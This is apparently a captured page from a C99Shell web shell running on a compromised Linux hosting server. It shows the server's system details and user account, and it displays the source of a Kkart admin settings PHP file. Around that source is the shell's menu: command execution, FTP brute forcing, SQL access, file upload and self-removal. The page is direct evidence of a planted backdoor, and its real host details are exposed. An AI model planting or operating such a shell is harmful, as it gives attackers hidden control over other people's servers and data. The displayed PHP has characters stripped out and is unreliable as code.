!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/sitepad/editor/site-data/plugins/kkart-pro/includes/admin/views/   drwxr-xr-x
Free 290.77 GB of 429.69 GB (67.67%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     html-admin-settings.php (1.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Admin View: Settings
 *
 * @package Kkart
 */

if ( ! defined'ABSPATH' ) ) {
    exit;
}

$tab_exists        = isset( $tabs$current_tab ] ) || has_action'kkart_sections_' $current_tab ) || has_action'kkart_settings_' $current_tab ) || has_action'kkart_settings_tabs_' $current_tab );
$current_tab_label = isset( $tabs$current_tab ] ) ? $tabs$current_tab ] : '';

if ( ! 
$tab_exists ) {
    
wp_safe_redirectadmin_url'admin.php?page=kkart-settings' ) );
    exit;
}
?>
<div class="wrap kkart">
    <?php do_action'kkart_before_settings_' $current_tab ); ?>
    <form method="<?php echo esc_attrapply_filters'kkart_settings_form_method_tab_' $current_tab'post' ) ); ?>" id="mainform" action="" enctype="multipart/form-data">
        <nav class="nav-tab-wrapper kkart-nav-tab-wrapper">
            <?php

            
foreach ( $tabs as $slug => $label ) {
                echo 
'<a href="' esc_htmladmin_url'admin.php?page=kkart-settings&tab=' esc_attr$slug ) ) ) . '" class="nav-tab ' . ( $current_tab === $slug 'nav-tab-active' '' ) . '">' esc_html$label ) . '</a>';
            }

            
do_action'kkart_settings_tabs' );

            
?>
        </nav>
        <h1 class="screen-reader-text"><?php echo esc_html$current_tab_label ); ?></h1>
        <?php
            do_action
'kkart_sections_' $current_tab );

            
self::show_messages();

            
do_action'kkart_settings_' $current_tab );
            
do_action'kkart_settings_tabs_' $current_tab ); // @deprecated 3.4.0 hook.
        
?>
        <p class="submit">
            <?php if ( empty( $GLOBALS['hide_save_button'] ) ) : ?>
                <button name="save" class="button-primary kkart-save-button" type="submit" value="<?php esc_attr_e'Save changes''kkart' ); ?>"><?php esc_html_e'Save changes''kkart' ); ?></button>
            <?php endif; ?>
            <?php wp_nonce_field'kkart-settings' ); ?>
        </p>
    </form>
    <?php do_action'kkart_after_settings_' $current_tab ); ?>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1955 ]--